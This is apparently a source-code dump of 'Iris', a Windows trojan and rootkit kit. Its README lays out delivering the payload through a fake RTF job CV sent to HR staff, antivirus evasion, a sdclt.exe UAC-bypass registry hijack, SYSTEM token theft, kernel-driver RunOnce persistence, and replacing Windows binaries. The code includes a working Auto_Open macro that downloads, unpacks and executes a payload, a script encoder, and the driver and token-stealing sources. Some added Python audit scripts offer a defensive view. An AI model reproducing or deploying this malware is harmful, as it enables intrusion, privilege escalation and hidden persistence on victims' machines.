```text
Iris
├── README.md
├── pic
│   ├── Cvrtf.png
│   ├── Cvrtf2.png
│   ├── RegistryLessPersistent.gif
│   ├── out-11.gif
│   └── out-6.gif
└── src
    ├── Delivery
    │   ├── DemoPayLoad.vbs
    │   └── MsEncoder.vbs
    ├── Drv
    │   ├── Device.c
    │   ├── Device.h
    │   ├── Driver.c
    │   ├── Driver.h
    │   ├── Public.h
    │   ├── Queue.c
    │   ├── Queue.h
    │   └── Trace.h
    ├── Installer
    │   ├── Chkntfs
    │   │   ├── Chkntfs.cpp
    │   │   ├── stdafx.cpp
    │   │   ├── stdafx.h
    │   │   └── targetver.h
    │   ├── Config
    │   │   ├── Config.c
    │   │   └── installer.c
    │   ├── README.md
    │   ├── RunOnce
    │   │   └── Program.cs
    │   ├── ds
    │   │   └── Program.cs
    │   ├── ns
    │   │   └── Program.cs
    │   └── tc32k
    │       └── Program.cs
    └── README.md
```

/Iris/README.md:
--------------------------------------------------------------------------------
# Iris

# Introduction
Throughout this repository I assume that any APT vendor has the equipment needed to run this sort of campaign.

# Description
Iris is a Trojan and a full-on rootkit targeting Windows machines, made for research purposes and as a resource kit for ethical hackers.

We begin with delivery methods and anti-virus evasion, and continue to local privilege escalation in order to obtain privileged persistence on the target machine. In this repo we try to simulate a full rootkit by hiding our persistence mechanism, and to simulate a real targeted campaign against a company or retailer.

I do not supply any binaries for any of the RAT components, nor forged certificates or native executables.

On the other hand, I will try to give as much information as possible on how to avoid getting hit by this kind of attack, and will try to supply as many open resources as possible so that you can implement your own tool, for ethical hacking purposes and for anti-virus software writers.

# Tech
# Packing:
This kit is built to simulate a targeted campaign against a retailer or a company, assuming that the company uses default Office products. Because of that, our main delivery method is through the Office API: I implement the payload as an RTF document, but it can easily be deployed in any other document type (.xls, .doc, etc.). I chose this payload because it does not require any prior preparation on the client side, and it is not recognized as malware by Gmail (afaik) or by most modern AV products.

In addition, receiving a CV for a job application as an RTF is an everyday, harmless-looking way to pack your payload, and any non-paranoid HR person is likely to open the document. Many browsers and mail providers do not render RTF inline the way they render PDF, which is a good enough reason to download the document and view it on the local machine.

The .rtf itself contains a .vbe payload that makes winword.exe download an encrypted zip archive containing our installer and the native drivers.

After the download, the script calls the decryptor with the decryption key, and that executable extracts the installation files to a writable location on the target machine in order to infect it.

# Spec: see the Delivery section under the /src directory.

# Installer:
The first thing our installer does is bypass UAC through registry hijacking, in order to trigger another executable that duplicates the SYSTEM token and lets us operate on the target as NT AUTHORITY\SYSTEM. In this kit we only use a UAC bypass, assuming that the target user is a member of the local Administrators group, but this mechanism can easily be exchanged for another LPE to cover the other cases; see my "JailBreaks" repo for that.

Concretely, the chain in this repository is: RunOnce/Program.cs writes the path of Chkntfs.exe into HKCU\Software\Classes\exefile\shell\runas\command (default value and isolatedCommand), Config.c then runs sdclt.exe /kickoffelev, an auto-elevating Windows binary that resolves the exefile "runas" verb from the user hive, and Chkntfs.cpp, now running elevated, opens the token of a SYSTEM process and uses it to start the next stages. Two caveats for anyone testing this: the hijack only works at the default UAC level (with UAC set to "Always notify", auto-elevation does not happen and the chain stops at a consent prompt), and Microsoft has since addressed this particular sdclt.exe vector in later Windows 10 builds.
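Both the delivery step (a macro inside a mailed document) and the elevation step (a per-user exefile handler plus sdclt.exe) leave registry state a defender can audit. The following Python is an added example, not code from the Iris repository: it checks a registry snapshot for the Office macro policy values (VBAWarnings, blockcontentexecutionfrominternet), for any per-user override of the built-in exefile class, and for the UAC consent level. The snapshot shape (a dict of key path to value-name/data pairs), the function names and the two sample snapshots are this example's own assumptions; on a live host the dict would be filled from winreg.

```python
import re
from typing import Dict, List

# Snapshot shape assumed by this example: {key path: {value name: data}}.
RegistrySnapshot = Dict[str, Dict[str, str]]

# Per-user policy keys that decide whether a macro in a mailed document can run.
OFFICE_SECURITY_KEYS = (
    r"HKCU\Software\Policies\Microsoft\Office\16.0\Word\Security",
    r"HKCU\Software\Policies\Microsoft\Office\16.0\Excel\Security",
)
# HKCU\Software\Classes shadows HKLM\Software\Classes when HKCR is resolved, so a
# per-user "exefile" verb is what an auto-elevating binary such as sdclt.exe ends
# up running. The built-in exefile class is never legitimately overridden per
# user, so any value under it is reported.
EXEFILE_VERB_RE = re.compile(
    r"^HKCU\\Software\\Classes\\exefile\\shell\\(?P<verb>[^\\]+)\\command$", re.IGNORECASE
)
UAC_POLICY_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"


def audit_macro_policy(snapshot: RegistrySnapshot) -> List[str]:
    """Warn when Word/Excel would let a user run the macro in a mailed document."""
    findings: List[str] = []
    for key in OFFICE_SECURITY_KEYS:
        app = key.split("\\")[-2]
        sec = snapshot.get(key, {})
        # VBAWarnings: 1 enable all, 2 disable with notification (the default),
        # 3 disable except digitally signed, 4 disable all without notification.
        if sec.get("VBAWarnings", "2") not in ("3", "4"):
            findings.append(f"warn: {app}: VBAWarnings={sec.get('VBAWarnings', 'unset')}, "
                            "a user can enable the macro in a mailed document")
        if sec.get("blockcontentexecutionfrominternet") != "1":
            findings.append(f"warn: {app}: macros in Mark-of-the-Web files are not blocked")
    return findings


def audit_elevation(snapshot: RegistrySnapshot) -> List[str]:
    """Alert on per-user exefile verbs and report a UAC level that allows auto-elevation."""
    findings: List[str] = []
    for key, values in snapshot.items():
        m = EXEFILE_VERB_RE.match(key)
        if not m:
            continue
        for name, data in values.items():
            findings.append(f"alert: per-user exefile '{m.group('verb')}' handler "
                            f"{name or '(Default)'} -> {data}")
    policy = snapshot.get(UAC_POLICY_KEY, {})
    if policy.get("EnableLUA", "1") == "0":
        findings.append("alert: UAC is disabled (EnableLUA=0)")
    elif policy.get("ConsentPromptBehaviorAdmin", "5") != "2":
        # 2 is "Always notify"; at the default level 5, signed auto-elevate
        # binaries such as sdclt.exe elevate without any prompt.
        findings.append("warn: UAC is not 'Always notify' (ConsentPromptBehaviorAdmin="
                        f"{policy.get('ConsentPromptBehaviorAdmin', '5')}); "
                        "auto-elevation is available to the hijack")
    return findings


def audit(snapshot: RegistrySnapshot) -> List[str]:
    return audit_macro_policy(snapshot) + audit_elevation(snapshot)


# Constructed sample: a default-policy host after RunOnce/Program.cs has run.
INFECTED_SNAPSHOT: RegistrySnapshot = {
    r"HKCU\Software\Classes\exefile\shell\runas\command": {
        "": r"C:\Users\Public\Documents\P\Chkntfs.exe",
        "isolatedCommand": r"C:\Users\Public\Documents\P\Chkntfs.exe",
    },
    UAC_POLICY_KEY: {"EnableLUA": "1", "ConsentPromptBehaviorAdmin": "5"},
}

# Constructed sample: a hardened host with no hijack present.
HARDENED_SNAPSHOT: RegistrySnapshot = {
    OFFICE_SECURITY_KEYS[0]: {"VBAWarnings": "4", "blockcontentexecutionfrominternet": "1"},
    OFFICE_SECURITY_KEYS[1]: {"VBAWarnings": "3", "blockcontentexecutionfrominternet": "1"},
    UAC_POLICY_KEY: {"EnableLUA": "1", "ConsentPromptBehaviorAdmin": "2"},
}

if __name__ == "__main__":
    for line in audit(INFECTED_SNAPSHOT):
        print(line)
```

The exefile check deliberately reports every per-user value, not just ones pointing outside C:\Windows: the class is machine-wide, so the mere presence of the key in HKCU is the indicator, whatever it points at.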
For persistence on the target machine, and to hide our activity, we install a native driver that we cover in the next sections, and make some necessary changes to the target machine. All our payload files are placed in the SysWow64 directory, to hide our activity (this targets x64 Windows machines specifically) and to support most .NET components of the payload, as explained later on.

After the installer is done it deletes itself and all other installation media from the target machine, to hide from debuggers and AV scanners. In addition, throughout the whole process I try to use as many native Windows APIs as possible, to avoid versioning problems and AV detection at every phase of the RAT's operation.

That means that, technically, I load the driver with sc.exe, I launch my payload with sdclt, and I try to use as many native loaders as possible to avoid detection and to avoid unnecessary and complex digital-signature forgery or user interaction.

In addition, an important part of our persistence on the target machine is hiding our own activity; for that we avoid registry manipulation as far as possible and use native APIs to add exceptions for our backdoors and C&C implementations, so as to leave as few signs of our existence on the target machine as possible.

# Av evasion
Any modern anti-virus product makes use of a "reputation method", meaning that even if your payload is successfully signed by a root SPC authority it does not necessarily follow that the target machine will execute it, simply because the reputation of your software is not known to the AV vendor's user community, and as such it may be blocked by any respectable AV product. Because of that we target two native programs: WinWord, which is whitelisted to execute any VBScript (I will explain why I use this native and not PowerShell), and the WScript engine, to execute our EoP. After EoP we have the permissions needed to execute any software without AV interference.

# There are two options to execute your payload and bypass all AV software (afaik)...
One -> Execute an RTF running under WinWord.
Second -> Execute a signed VBE (simply because a script does not carry reputation, so Open File will not block your application because of its signature, and the AV will not flag bad reputation simply because it is a .vbe...).
I will point out that if you are working under Windows 10 build 14xx and lower, there is also the possibility of packing your payload inside a signed .cab file (for Open File warnings), or simply using an .hta application which, for some reason, on those older builds does not trigger the Open File warning or AV detection; but in this repo we use the .rtf described above.

# Persistance & Avoiding detection.
One thing we really do not want to do is place registry keys for our persistence. Because of that (and to gain the ability to inject our C&C into native applications) we install a native driver and load it as an auto-start driver, which means it is loaded even if no user signs in to the machine. The driver places registry entries under RunOnce that are automatically erased after logon; that way we do not leave registry keys pointing to our C&C. One caveat a tester will hit immediately: on 64-bit Windows, Driver Signature Enforcement refuses to load a kernel driver that is not signed with an accepted certificate unless the machine is in test-signing mode, and this repository ships no signed driver.

In addition the driver can reinstall the software if the user removes the installation components, meaning that only a format can clean the infected machine.
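The persistence scheme above has fixed, auditable footprints: a kernel service whose ImagePath is outside System32\drivers, RunOnce values pointing at non-Microsoft binaries, and non-Microsoft executables sitting in SysWOW64 or servicing\Packages. As an added example that is not code from the Iris repository, the Python below checks constructed records of those three sources and also reports whether a flagged auto-start driver is listed under SafeBoot\Minimal, which is what decides whether Safe Mode is a usable clean-up path. The record types, the RunOnce value name "Stage1" and the signer strings are assumptions of this example; on a live host the records would come from HKLM\SYSTEM\CurrentControlSet\Services, HKLM\...\CurrentVersion\RunOnce and a signed-file inventory such as sigcheck output with catalog lookup.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Service:
    """One constructed entry standing in for HKLM\\SYSTEM\\CurrentControlSet\\Services\\<name>."""
    name: str
    type: int        # 1 == SERVICE_KERNEL_DRIVER
    start: int       # 0 boot, 1 system, 2 auto, 3 demand, 4 disabled
    image_path: str  # raw ImagePath value


@dataclass
class FileRecord:
    """One constructed executable from a signed-file inventory."""
    path: str
    signer: str      # Authenticode/catalog signer subject, "" when unsigned


SERVICE_KERNEL_DRIVER = 1
SERVICE_AUTO_START = 2
MICROSOFT_SIGNER = "Microsoft Windows"
DRIVER_DIR_RE = re.compile(
    r"^(\\SystemRoot\\|%SystemRoot%\\|C:\\Windows\\)?System32\\drivers\\", re.IGNORECASE)
SYSTEM_DIR_RE = re.compile(
    r"^C:\\Windows\\(System32|SysWOW64|servicing\\Packages)\\", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"^C:\\Users\\", re.IGNORECASE)
# Windows binaries that installer.c deletes or overwrites.
REPLACED_OS_BINARIES = {"runonce.exe", "chkntfs.exe", "autochk.exe"}


def _normalize(path: str) -> str:
    """Strip quotes and the NT \\??\\ prefix that sc.exe stores in binpath= values."""
    path = path.strip().strip('"')
    return path[4:] if path.startswith("\\??\\") else path


def _command_target(cmd: str) -> str:
    """First token of a RunOnce command line, honouring a quoted image path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd[1:].split('"', 1)[0]
    return cmd.split(" ", 1)[0]


def audit_persistence(services: List[Service], runonce: Dict[str, str],
                      files: List[FileRecord], safeboot_minimal: List[str]) -> List[str]:
    findings: List[str] = []
    safeboot = {s.lower() for s in safeboot_minimal}

    for svc in services:
        if svc.type != SERVICE_KERNEL_DRIVER:
            continue
        image = _normalize(svc.image_path)
        if USER_WRITABLE_RE.match(image):
            findings.append(f"alert: kernel driver {svc.name} loads from user-writable {image}")
        elif not DRIVER_DIR_RE.match(image):
            findings.append(f"warn: kernel driver {svc.name} loads from outside System32\\drivers: {image}")
        else:
            continue
        if svc.start == SERVICE_AUTO_START and svc.name.lower() not in safeboot:
            # For the responder: an auto-start driver that is not listed under
            # SafeBoot\Minimal is not loaded in Safe Mode, so Safe Mode is a clean-up path.
            findings.append(f"info: {svc.name} is auto-start but absent from SafeBoot\\Minimal; "
                            "it will not load in Safe Mode")

    by_path = {f.path.lower(): f for f in files}
    for name, cmd in runonce.items():
        target = _normalize(_command_target(cmd))
        rec = by_path.get(target.lower())
        if USER_WRITABLE_RE.match(target) or (rec is not None and rec.signer != MICROSOFT_SIGNER):
            findings.append(f"alert: RunOnce\\{name} -> {target} is not a Microsoft-signed binary")

    for rec in files:
        if SYSTEM_DIR_RE.match(rec.path) and rec.signer != MICROSOFT_SIGNER:
            base = rec.path.rsplit("\\", 1)[-1].lower()
            kind = "OS binary replaced" if base in REPLACED_OS_BINARIES else "foreign binary in system directory"
            findings.append(f"alert: {kind}: {rec.path} (signer: {rec.signer or 'none'})")
    return findings


# Constructed sample data mirroring what installer.c and the driver leave behind.
SAMPLE_SERVICES = [
    Service("disk", SERVICE_KERNEL_DRIVER, 0, r"System32\drivers\disk.sys"),
    Service("Zxc", SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, r"\??\C:\Users\Public\Documents\Zxc.sys"),
]
SAMPLE_RUNONCE = {"Stage1": r"C:\Windows\SysWOW64\installer.exe"}
SAMPLE_FILES = [
    FileRecord(r"C:\Windows\SysWOW64\cmd.exe", "Microsoft Windows"),
    FileRecord(r"C:\Windows\SysWOW64\RunOnce.exe", ""),
    FileRecord(r"C:\Windows\SysWOW64\installer.exe", ""),
    FileRecord(r"C:\Windows\servicing\Packages\CMake.exe", ""),
]
SAMPLE_SAFEBOOT_MINIMAL = ["disk", "Base"]

if __name__ == "__main__":
    for line in audit_persistence(SAMPLE_SERVICES, SAMPLE_RUNONCE, SAMPLE_FILES, SAMPLE_SAFEBOOT_MINIMAL):
        print(line)
```

The file check is deliberately signer-based rather than name-based: replacing RunOnce.exe or autochk.exe with an unsigned build is the whole trick, and a name list alone would miss the extra binaries (installer.exe, Cmake.exe, cleanup.exe) that are copied in beside them.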
In addition, our installer places the entire C&C media inside the system directories to further evade detection. Another mechanism we implement, to achieve yet another persistence method, is to erase the native RunOnce executable, so the driver can place entries under RunOnce and our binary is called instead of the native application, loading our payload every time the user logs into the local installation. The intent is that the driver is loaded even when using safe boot, and that, since our installation media replaces native operating system components, a "safe boot" recovery is not an option for removing the RAT. Note, however, that an auto-start kernel driver is loaded in Safe Mode only if its service is also listed under HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal (or \Network), and the installer shown here adds no such entry; a responder should therefore still try Safe Mode before reaching for a format.

# Addendum
The source code is given as is, without any warranty. You can copy and redistribute it, and you do not have to point to this repository while you do so. This repository was made for educational purposes; I will not help anyone to compile the given code or to test it. I will answer questions about this project at the mailbox referenced in my profile details. I hope you, the reader, will make good use of this repository, and I am open to any further suggestions or questions about it.
In addition, I will try to detail every step of making the software inside the code sections of each individual component.

# Building The Executables
You will need the WDK, VS 2015 & VS 2017.

# Tested on the latest Windows and Office, and against the latest anti-virus software and email providers, as of:
# 1/8/2017
# Notes: This RAT does not support smart firewall campaigns and as such does not send any UDP packets to the root C&C server.
# Proof Of Concept

# Delivery
![](pic/out-11.gif)

# Av
# No threats detected & No FireWall Block or user interactions.
![](pic/Cvrtf.png)
![](pic/Cvrtf2.png)

# Persistence
# No Registry

![](pic/RegistryLessPersistent.gif)

# Not operating from user land, and the user does not need to be a domain admin.

![](pic/out-6.gif)

--------------------------------------------------------------------------------
/Iris/pic/Cvrtf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SarinI0/Rats/581aa50d177aa536910ef729dd33af43890b861c/Iris/pic/Cvrtf.png
--------------------------------------------------------------------------------
/Iris/pic/Cvrtf2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SarinI0/Rats/581aa50d177aa536910ef729dd33af43890b861c/Iris/pic/Cvrtf2.png
--------------------------------------------------------------------------------
/Iris/pic/RegistryLessPersistent.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SarinI0/Rats/581aa50d177aa536910ef729dd33af43890b861c/Iris/pic/RegistryLessPersistent.gif
--------------------------------------------------------------------------------
/Iris/pic/out-11.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SarinI0/Rats/581aa50d177aa536910ef729dd33af43890b861c/Iris/pic/out-11.gif
--------------------------------------------------------------------------------
/Iris/pic/out-6.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SarinI0/Rats/581aa50d177aa536910ef729dd33af43890b861c/Iris/pic/out-6.gif
--------------------------------------------------------------------------------
/Iris/src/Delivery/DemoPayLoad.vbs:
--------------------------------------------------------------------------------
```vb
' Encode this script & save it as Cv.rtf; WinWord will do the job for you.

Sub Auto_Open()
    HTTPDownload "http://zippedpayload", "C:\Users\Public\Documents\P.zip"
    Execute

End Sub

' Fetch myURL with WinHttpRequest and write the response body byte by byte to myPath.
Public Function HTTPDownload(myURL, myPath)
    Dim i, objFile, objFSO, objHTTP, strFile, strMsg
    Const ForReading = 1, ForWriting = 2, ForAppending = 8
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.FolderExists(myPath) Then
        strFile = objFSO.BuildPath(myPath, Mid(myURL, InStrRev(myURL, "/") + 1))
    ElseIf objFSO.FolderExists(Left(myPath, InStrRev(myPath, "\") - 1)) Then
        strFile = myPath
    End If
    Set objFile = objFSO.OpenTextFile(strFile, ForWriting, True)
    Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
    objHTTP.Open "GET", myURL, False
    objHTTP.Send
    For i = 1 To LenB(objHTTP.ResponseBody)
        objFile.Write Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))
    Next

End Function

' Unpack the downloaded zip with the Shell.Application COM object and launch the installer.
Public Function Execute() As Variant
    Dim args, num, ex, dr
    Dim var1, var2
    Dim objFSO, objFolder
    Dim objStream
    Dim objSha
    Dim WshShell
    Dim objSh
    Dim strFolder, strURL, strFile, strFull
    Dim strUnat, strCmdLine, strDmdLine
    ex = "cscript.exe C:\Users\Public\Documents\P\Payload.exe"
    Set WshShell = CreateObject("WScript.Shell")
    ZipFile = "C:\Users\Public\Documents\P.zip"
    ExtractTo = "C:\Users\Public\Documents\P"
    Set fso = CreateObject("Scripting.FileSystemObject")
    If Not fso.FolderExists(ExtractTo) Then
        fso.CreateFolder (ExtractTo)
    End If
    Set objShell = CreateObject("Shell.Application")
    Set FilesInZip = objShell.Namespace(ZipFile).items
    objShell.Namespace(ExtractTo).CopyHere (FilesInZip)
    Set fso = Nothing
    Set objShell = Nothing
    Set objSha = CreateObject("shell.application")
    objSha.ShellExecute "C:\Users\Public\Documents\P\Payload.exe", "Arguments", "C:\Users\Public\Documents\P\", "open", 1 'etc
End Function

```
--------------------------------------------------------------------------------
/Iris/src/Delivery/MsEncoder.vbs:
--------------------------------------------------------------------------------
```vb
Option Explicit

dim oEncoder, oFilesToEncode, file, sDest
dim sFileOut, oFile, oEncFile, oFSO, i
dim oStream, sSourceFile

' Encode every .vbs given on the command line into a .vbe next to it, using the
' Windows Script Encoder COM object.
set oFilesToEncode = WScript.Arguments
set oEncoder = CreateObject("Scripting.Encoder")
For i = 0 to oFilesToEncode.Count - 1
    set oFSO = CreateObject("Scripting.FileSystemObject")
    file = oFilesToEncode(i)
    set oFile = oFSO.GetFile(file)
    Set oStream = oFile.OpenAsTextStream(1)
    sSourceFile=oStream.ReadAll
    oStream.Close
    sDest = oEncoder.EncodeScriptFile(".vbs",sSourceFile,0,"")
    sFileOut = Left(file, Len(file) - 3) & "vbe"
    Set oEncFile = oFSO.CreateTextFile(sFileOut)
    oEncFile.Write sDest
    oEncFile.Close
Next

```

--------------------------------------------------------------------------------
/Iris/src/Drv/Device.c:
--------------------------------------------------------------------------------
```c
#include "driver.h"
#include "device.tmh"

#ifdef ALLOC_PRAGMA
#pragma alloc_text (PAGE, ds64bCreateDevice)
#endif

// Stock KMDF template: create the device object, expose the device interface,
// then set up the default I/O queue.
NTSTATUS
ds64bCreateDevice(
    _Inout_ PWDFDEVICE_INIT DeviceInit
    )
{
    WDF_OBJECT_ATTRIBUTES deviceAttributes;
    PDEVICE_CONTEXT deviceContext;
    WDFDEVICE device;
    NTSTATUS status;

    PAGED_CODE();

    WDF_OBJECT_ATTRIBUTES_INIT_CONTEXT_TYPE(&deviceAttributes, DEVICE_CONTEXT);

    status = WdfDeviceCreate(&DeviceInit, &deviceAttributes, &device);

    if (NT_SUCCESS(status)) {

        deviceContext = DeviceGetContext(device);

        deviceContext->PrivateDeviceData = 0;

        status = WdfDeviceCreateDeviceInterface(
            device,
            &GUID_DEVINTERFACE_ds64b,
            NULL
            );

        if (NT_SUCCESS(status)) {
            status = ds64bQueueInitialize(device);
        }
    }

    return status;
}
```

--------------------------------------------------------------------------------
/Iris/src/Drv/Device.h:
--------------------------------------------------------------------------------
```c
#include "public.h"

EXTERN_C_START

typedef struct _DEVICE_CONTEXT
{
    ULONG PrivateDeviceData;

} DEVICE_CONTEXT, *PDEVICE_CONTEXT;

WDF_DECLARE_CONTEXT_TYPE_WITH_NAME(DEVICE_CONTEXT, DeviceGetContext)

NTSTATUS
ds64bCreateDevice(
    _Inout_ PWDFDEVICE_INIT DeviceInit
    );

EXTERN_C_END
```

--------------------------------------------------------------------------------
/Iris/src/Drv/Driver.c:
--------------------------------------------------------------------------------
```c
#pragma once
#include "driver.h"
#include "driver.tmh"

#ifdef ALLOC_PRAGMA
#pragma alloc_text (INIT, DriverEntry)
#endif

#include
#include
#include

#pragma comment(lib, "NtosKrnl.lib")
#pragma comment(lib, "Ntdll.lib")

// Creates (or opens) the registry key named by ld and writes the REG_SZ value
// ln = lv under it, straight from kernel mode through the Zw* registry APIs.
VOID
Persistent(
    _In_ LPWSTR ld,
    _In_ LPWSTR lv,
    _In_ LPWSTR ln
    )
{
    UNICODE_STRING Ro;
    UNICODE_STRING Re;
    OBJECT_ATTRIBUTES obj;
    HANDLE hKey;

    RtlInitUnicodeString(&Ro, ld);

    obj.Length = sizeof(OBJECT_ATTRIBUTES);
    obj.RootDirectory = NULL;
    obj.ObjectName = &Ro;
    obj.SecurityDescriptor = NULL;
    obj.SecurityQualityOfService = NULL;
    obj.Attributes = OBJ_CASE_INSENSITIVE;

    char buff[256] = { 0 };
    ZwCreateKey(
        &hKey,
        GENERIC_ALL,
        &obj,
        0,
        NULL,
        0,
        NULL
        );

    LPWSTR lDat = lv;
    RtlInitUnicodeString(&Re, ln);
    ZwSetValueKey(hKey, &Re, 0, REG_SZ, lDat, wcslen(lDat) * sizeof(wchar_t));
    ZwClose(hKey);
}

// DriverEntry only writes the two RunOnce values and returns. It never calls
// WdfDriverCreate, so the KMDF device/queue code in Device.c and Queue.c is
// not reached, and no DriverUnload routine is registered.
NTSTATUS
DriverEntry(
    _In_ PDRIVER_OBJECT DriverObject,
    _In_ PUNICODE_STRING RegistryPath
    )
{
    LPWSTR ld0 = L"\\Registry\\Machine\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce";
    LPWSTR lv0 = // you can place anything here.
    LPWSTR ln0 = // you can place anything here.
    LPWSTR lv1 = // you can place anything here.
    LPWSTR ln1 = // you can place anything here.
    Persistent(
        ld0,
        lv0,
        ln0
        );
    Persistent(
        ld0,
        lv1,
        ln1
        );
    return STATUS_SUCCESS;
}
```

--------------------------------------------------------------------------------
/Iris/src/Drv/Driver.h:
--------------------------------------------------------------------------------
```c
#include
#include
#include

#include "device.h"
#include "queue.h"
#include "trace.h"

EXTERN_C_START

DRIVER_INITIALIZE DriverEntry;
EVT_WDF_DRIVER_DEVICE_ADD ds64bEvtDeviceAdd;
EVT_WDF_OBJECT_CONTEXT_CLEANUP ds64bEvtDriverContextCleanup;

EXTERN_C_END
```

--------------------------------------------------------------------------------
/Iris/src/Drv/Public.h:
--------------------------------------------------------------------------------
```c
DEFINE_GUID (GUID_DEVINTERFACE_ds64b,
    0x53a16c7d,0x6a24,0x4ad4,0xa3,0xb6,0xde,0x00,0x31,0x6f,0x18,0xde);
```

--------------------------------------------------------------------------------
/Iris/src/Drv/Queue.c:
--------------------------------------------------------------------------------
```c
#include "driver.h"
#include "queue.tmh"

#ifdef ALLOC_PRAGMA
#pragma alloc_text (PAGE, ds64bQueueInitialize)
#endif

// Stock KMDF template: a parallel default queue whose IOCTL handler completes
// every request with STATUS_SUCCESS and does no work.
NTSTATUS
ds64bQueueInitialize(
    _In_ WDFDEVICE Device
    )
{
    WDFQUEUE queue;
    NTSTATUS status;
    WDF_IO_QUEUE_CONFIG queueConfig;

    PAGED_CODE();

    WDF_IO_QUEUE_CONFIG_INIT_DEFAULT_QUEUE(
        &queueConfig,
        WdfIoQueueDispatchParallel
        );

    queueConfig.EvtIoDeviceControl = ds64bEvtIoDeviceControl;
    queueConfig.EvtIoStop = ds64bEvtIoStop;

    status = WdfIoQueueCreate(
        Device,
        &queueConfig,
        WDF_NO_OBJECT_ATTRIBUTES,
        &queue
        );

    if(!NT_SUCCESS(status)) {
        TraceEvents(TRACE_LEVEL_ERROR, TRACE_QUEUE, "WdfIoQueueCreate failed %!STATUS!", status);
        return status;
    }

    return status;
}

VOID
ds64bEvtIoDeviceControl(
    _In_ WDFQUEUE Queue,
    _In_ WDFREQUEST Request,
    _In_ size_t OutputBufferLength,
    _In_ size_t InputBufferLength,
    _In_ ULONG IoControlCode
    )
{
    TraceEvents(TRACE_LEVEL_INFORMATION,
                TRACE_QUEUE,
                "%!FUNC! Queue 0x%p, Request 0x%p OutputBufferLength %d InputBufferLength %d IoControlCode %d",
                Queue, Request, (int) OutputBufferLength, (int) InputBufferLength, IoControlCode);

    WdfRequestComplete(Request, STATUS_SUCCESS);

    return;
}

VOID
ds64bEvtIoStop(
    _In_ WDFQUEUE Queue,
    _In_ WDFREQUEST Request,
    _In_ ULONG ActionFlags
    )
{
    TraceEvents(TRACE_LEVEL_INFORMATION,
                TRACE_QUEUE,
                "%!FUNC! Queue 0x%p, Request 0x%p ActionFlags %d",
                Queue, Request, ActionFlags);

    return;
}
```

--------------------------------------------------------------------------------
/Iris/src/Drv/Queue.h:
--------------------------------------------------------------------------------
```c
EXTERN_C_START

typedef struct _QUEUE_CONTEXT {

    ULONG PrivateDeviceData;

} QUEUE_CONTEXT, *PQUEUE_CONTEXT;

WDF_DECLARE_CONTEXT_TYPE_WITH_NAME(QUEUE_CONTEXT, QueueGetContext)

NTSTATUS
ds64bQueueInitialize(
    _In_ WDFDEVICE Device
    );
EVT_WDF_IO_QUEUE_IO_DEVICE_CONTROL ds64bEvtIoDeviceControl;
EVT_WDF_IO_QUEUE_IO_STOP ds64bEvtIoStop;

EXTERN_C_END
```

--------------------------------------------------------------------------------
/Iris/src/Drv/Trace.h:
--------------------------------------------------------------------------------
```c
#define WPP_CONTROL_GUIDS                                              \
    WPP_DEFINE_CONTROL_GUID(                                           \
        ds64bTraceGuid, (05e1ca77,5869,4c19,aee8,d735147e9974),        \
                                                                       \
        WPP_DEFINE_BIT(MYDRIVER_ALL_INFO)                              \
        WPP_DEFINE_BIT(TRACE_DRIVER)                                   \
        WPP_DEFINE_BIT(TRACE_DEVICE)                                   \
        WPP_DEFINE_BIT(TRACE_QUEUE)                                    \
        )

#define WPP_FLAG_LEVEL_LOGGER(flag, level)                             \
    WPP_LEVEL_LOGGER(flag)

#define WPP_FLAG_LEVEL_ENABLED(flag, level)                            \
    (WPP_LEVEL_ENABLED(flag) &&                                        \
     WPP_CONTROL(WPP_BIT_ ## flag).Level >= level)

#define WPP_LEVEL_FLAGS_LOGGER(lvl,flags)                              \
    WPP_LEVEL_LOGGER(flags)

#define WPP_LEVEL_FLAGS_ENABLED(lvl, flags)                            \
    (WPP_LEVEL_ENABLED(flags) && WPP_CONTROL(WPP_BIT_ ## flags).Level >= lvl)

#define WPP_RECORDER_FLAGS_LEVEL_ARGS(flags, lvl) WPP_RECORDER_LEVEL_FLAGS_ARGS(lvl, flags)
#define WPP_RECORDER_FLAGS_LEVEL_FILTER(flags, lvl) WPP_RECORDER_LEVEL_FLAGS_FILTER(lvl, flags)
```

--------------------------------------------------------------------------------
/Iris/src/Installer/Chkntfs/Chkntfs.cpp:
--------------------------------------------------------------------------------
```cpp
#include "stdafx.h"
#include

#pragma comment(lib, "wtsapi32")
#pragma comment(linker,"/SUBSYSTEM:windows /ENTRY:mainCRTStartup")

BOOL IsSystemSid(PSID sid) {
    return ::IsWellKnownSid(sid, WinLocalSystemSid);
}

// Walk the process list and return a token handle from the first session-0
// process running as LocalSystem. Needs SeDebugPrivilege, i.e. an elevated caller.
HANDLE OpenSystemProcessToken() {
    PWTS_PROCESS_INFO pInfo;
    DWORD count;
    if (!::WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pInfo, &count)) {
        return nullptr;
    }

    HANDLE hToken{};
    for (DWORD i = 0; i < count && !hToken; i++) {
        if (pInfo[i].SessionId == 0 && IsSystemSid(pInfo[i].pUserSid)) {
            auto hProcess = ::OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pInfo[i].ProcessId);
            if (hProcess) {
                ::OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY | TOKEN_IMPERSONATE, &hToken);
                ::CloseHandle(hProcess);
            }
        }
    }

    ::WTSFreeMemory(pInfo);
    return hToken;
}

BOOL SetPrivilege(HANDLE hToken, PCTSTR lpszPrivilege, bool bEnablePrivilege) {
    TOKEN_PRIVILEGES tp;
    LUID luid;

    if (!::LookupPrivilegeValue(nullptr, lpszPrivilege, &luid))
        return FALSE;

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    if (bEnablePrivilege)
